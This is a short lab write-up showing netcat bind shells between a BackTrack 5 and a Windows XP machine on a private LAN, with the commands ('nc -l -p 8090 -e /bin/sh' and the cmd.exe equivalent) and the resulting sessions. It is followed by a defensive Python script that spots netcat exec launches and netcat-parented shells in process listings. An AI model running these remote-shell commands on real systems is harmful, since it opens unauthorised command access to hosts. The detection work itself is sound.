netcat download: http://sourceforge.net/projects/netcat/?source=navbar
On BT5:
root@bt:~# nc -l -p 8090 -e /bin/sh
On XP:
E:\>nc 192.168.1.11 8090
ls
Desktop
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:8f:6e:f9
inet addr:192.168.1.11 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe8f:6ef9/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:191926 errors:0 dropped:0 overruns:0 frame:0
TX packets:190831 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:12197170 (12.1 MB) TX bytes:11565866 (11.5 MB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:114541 errors:0 dropped:0 overruns:0 frame:0
TX packets:114541 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:26430568 (26.4 MB) TX bytes:26430568 (26.4 MB)
Then, on XP:
E:\黑客\工具\netcat>nc -l -p 8090 -e C:\WINDOWS\system32\cmd.exe
On BT5:
root@bt:~# nc 192.168.1.109 8090
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
E:\黑客\工具\netcat>dir
dir
驱动器 E 中的卷是 本地磁盘
卷的序列号是 EC10-1C79
E:\黑客\工具\netcat 的目录
2013-07-06 17:16 <DIR> .
2013-07-06 17:16 <DIR> ..
2004-12-29 13:07 61,440 nc.exe
2013-07-06 16:44 75,267 nc110.tgz
2013-07-06 13:52 <DIR> nc111nt
2013-01-04 20:58 106,923 nc111nt.zip
2013-07-06 16:58 398,872 netcat-0.7.1.tar.gz
2013-04-09 21:06 439,215 netcat.rar
5 个文件 1,081,717 字节
3 个目录 4,692,963,328 可用字节
E:\黑客\工具\netcat>
Comparing the two: after getting bash on XP there is no shell prompt in front of the commands, but when getting a cmd shell on BT5 I do get a prompt.
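The two sessions above are the same pattern seen from both sides: a netcat listener started with -e hands the accepted socket straight to a shell, so the shell's parent process is netcat and its standard streams are the socket. Both facts are visible in an ordinary process listing, which is how a defender would spot this on a host. The following script is an added example (not from the original post or from the netcat project): it scans ps-style lines for netcat started with an exec flag and for a shell whose parent is netcat. The process list is a constructed sample built from the two commands in the post plus some made-up filler, including a harmless port probe to show what is not flagged; the input layout (pid, ppid, comm, args) is an assumption, so adapt parse_ps_line() for other sources.

```python
"""Spot netcat bind/reverse shells in a process listing (added example)."""
import re
import shlex

# Binary names (without .exe) and exec-style flags worth looking at.
# -e is classic nc, --exec/--sh-exec are ncat, -c is the "shell command" form.
NETCAT_NAMES = {"nc", "ncat", "netcat", "nc64"}
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "cmd", "powershell"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}

# Constructed sample in "ps -eo pid,ppid,comm,args" layout.  Lines 1200 and
# 2100 are the two commands from the post; the rest is made-up filler.
SAMPLE_PS = [
    " 1200     1 nc       nc -l -p 8090 -e /bin/sh",
    " 1201  1200 sh       /bin/sh",
    " 1300     1 sshd     /usr/sbin/sshd -D",
    " 1400  1300 bash     -bash",
    " 1500  1400 nc       nc -zv 192.168.1.1 22",
    r" 2100   800 nc.exe   nc -l -p 8090 -e C:\WINDOWS\system32\cmd.exe",
    r" 2101  2100 cmd.exe  C:\WINDOWS\system32\cmd.exe",
]


def base_name(path):
    """Normalise a program path: '/bin/sh' -> 'sh', 'C:\\...\\cmd.exe' -> 'cmd',
    '-bash' (login shell convention) -> 'bash'."""
    name = re.split(r"[\\/]", path)[-1].lower().lstrip("-")
    return name[:-4] if name.endswith(".exe") else name


def parse_ps_line(line):
    """Split one 'pid ppid comm args' line; args keeps its internal spaces."""
    pid, ppid, comm, args = line.split(None, 3)
    return {"pid": int(pid), "ppid": int(ppid), "comm": comm, "args": args}


def split_args(args):
    # posix=False keeps Windows backslash paths intact instead of treating
    # the backslash as an escape character.
    try:
        return shlex.split(args, posix=False)
    except ValueError:
        return args.split()


def netcat_exec_finding(proc):
    """Return a finding if this is netcat with a program attached to the socket."""
    if base_name(proc["comm"]) not in NETCAT_NAMES:
        return None
    argv = split_args(proc["args"])
    target = None
    for i, tok in enumerate(argv[:-1]):
        if tok in EXEC_FLAGS:
            target = argv[i + 1]
    if target is None:
        return None  # e.g. a plain port probe such as "nc -zv host 22"
    # -l may be bundled with other short flags (-lp, -lvnp), so look for the
    # letter inside any single-dash option group.
    listening = "--listen" in argv or any(
        t.startswith("-") and not t.startswith("--") and "l" in t for t in argv[1:]
    )
    kind = "bind shell" if listening else "reverse shell"
    return {"pid": proc["pid"], "kind": "netcat_exec",
            "detail": "%s %s (%s)" % (kind, target, proc["args"])}


def scan(lines):
    """Return findings for netcat exec launches and shells parented by netcat."""
    procs = [parse_ps_line(l) for l in lines if l.strip()]
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for p in procs:
        f = netcat_exec_finding(p)
        if f:
            findings.append(f)
        parent = by_pid.get(p["ppid"])
        if (parent and base_name(p["comm"]) in SHELL_NAMES
                and base_name(parent["comm"]) in NETCAT_NAMES):
            findings.append({
                "pid": p["pid"], "kind": "shell_child_of_netcat",
                "detail": "%s spawned by pid %d (%s)"
                          % (p["comm"], parent["pid"], parent["args"]),
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_PS):
        print("pid %-5d %-22s %s" % (f["pid"], f["kind"], f["detail"]))
```

On the sample, the two netcat listeners and their child shells are reported (four findings) while the sshd login shell and the port probe on pid 1500 are not. The parent-child rule is the more robust of the two: it still fires when the command line has been obfuscated or the binary renamed, as long as the shell's parent is recognisable as netcat.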